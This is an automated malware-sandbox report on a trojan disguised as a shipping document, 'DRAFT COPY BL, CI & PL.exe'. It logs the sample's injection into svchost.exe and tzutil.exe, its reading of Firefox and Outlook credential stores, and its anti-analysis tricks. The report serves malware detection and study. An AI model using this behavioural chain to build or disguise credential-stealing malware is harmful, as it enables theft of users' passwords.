                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A059106_2_03A05910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039799506_2_03979950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398B9506_2_0398B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039738E06_2_039738E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039DD8006_2_039DD800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03971F926_2_03971F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FFB16_2_03A2FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03933FD26_2_03933FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03933FD56_2_03933FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FF096_2_03A2FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03979EB06_2_03979EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398FDC06_2_0398FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A27D736_2_03A27D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03973D406_2_03973D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A21D5A6_2_03A21D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FCF26_2_03A2FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E9C326_2_039E9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F81FA06_2_02F81FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7CEA06_2_02F7CEA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7B2106_2_02F7B210
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7B20E6_2_02F7B20E
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7B0C06_2_02F7B0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F7D0C06_2_02F7D0C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F856406_2_02F85640
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F838506_2_02F83850
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F8384B6_2_02F8384B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F9BDC06_2_02F9BDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377E2E56_2_0377E2E5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377E79F6_2_0377E79F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377E4066_2_0377E406
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377CB036_2_0377CB03
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0377D8686_2_0377D868
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: String function: 00958900 appears 42 times
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: String function: 00937DE1 appears 35 times
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: String function: 00950AE3 appears 70 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039DEA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0395B970 appears 262 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039B7E54 appears 107 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039A5130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039EF290 appears 103 times
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1705746306.00000000030C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DRAFT COPY BL, CI & PL.exe
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1706586938.00000000039CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DRAFT COPY BL, CI & PL.exe
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@13/7
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099A06A GetLastError,FormatMessageW,0_2_0099A06A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009881CB AdjustTokenPrivileges,CloseHandle,0_2_009881CB
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009887E1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0099B3FB
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_009AEE0D
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0099C397
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00934E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00934E89
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeFile created: C:\Users\user\AppData\Local\Temp\autBF19.tmpJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCommand line argument: 0`0_2_009347D0
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 00000006.00000003.2402962604.0000000003301000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.0000000003301000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.00000000032DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DRAFT COPY BL, CI & PL.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exe"Jump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: DRAFT COPY BL, CI & PL.exeStatic file information: File size 1213952 > 1048576
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oFlOzErifOVgUf.exe, 00000005.00000000.2145067730.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707183628.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, DRAFT COPY BL, CI & PL.exe, 00000000.00000003.1707820889.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2221539136.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2221539136.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2121845670.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2123770823.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000006.00000002.3521136563.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2221550559.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2224087314.000000000377D000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521136563.0000000003930000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.00000000047AC000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000003F5C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C48C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: svchost.exe, 00000001.00000003.2188962143.0000000003626000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188878550.000000000361B000.00000004.00000020.00020000.00000000.sdmp, oFlOzErifOVgUf.exe, 00000005.00000003.2228659382.000000000116B000.00000004.00000001.00020000.00000000.sdmp
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: DRAFT COPY BL, CI & PL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00934B37 LoadLibraryA,GetProcAddress,0_2_00934B37
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099848F push FFFFFF8Bh; iretd 0_2_00998491
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095E70F push edi; ret 0_2_0095E711
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095E828 push esi; ret 0_2_0095E82A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00958945 push ecx; ret 0_2_00958958
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095EAEC push edi; ret 0_2_0095EAEE
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095EA03 push esi; ret 0_2_0095EA05
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416857 push esp; iretd 1_2_00416858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D8D0 push esp; iretd 1_2_0040D8D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004051E6 push esp; retf 1_2_00405205
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032C0 push eax; ret 1_2_004032C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D352 push dword ptr [ebp-59622DFFh]; iretd 1_2_0040D358
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414B13 pushad ; iretd 1_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414B85 pushad ; iretd 1_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414BA2 pushad ; iretd 1_2_00414B78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164A9 push es; retf 1_2_004164BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416505 push es; retf 1_2_004164BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413653 push ebx; retf 1_2_0041369C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0283D push eax; iretd 1_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01368 push eax; iretd 1_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01065 push edi; ret 1_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_0132692C push esp; retf 5_2_0132694B
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_01337BEF push es; retf 5_2_01337C03
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_01336259 pushad ; iretd 5_2_013362BE
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013362E8 pushad ; iretd 5_2_013362BE
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013362CB pushad ; iretd 5_2_013362BE
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_01339D03 push edi; iretd 5_2_01339D06
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_01339D7A pushfd ; iretd 5_2_01339D98
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeFile created: \draft copy bl, ci & pl.exe
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeFile created: \draft copy bl, ci & pl.exeJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009348D7
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009B5376
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00953187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00953187
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeAPI/Special instruction interceptor: Address: 10D982C
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104893
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.8 %
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe TID: 4228Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4284Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exe TID: 4284Thread sleep time: -74000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\tzutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0099445A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099C6D1 FindFirstFileW,FindClose,0_2_0099C6D1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0099C75C
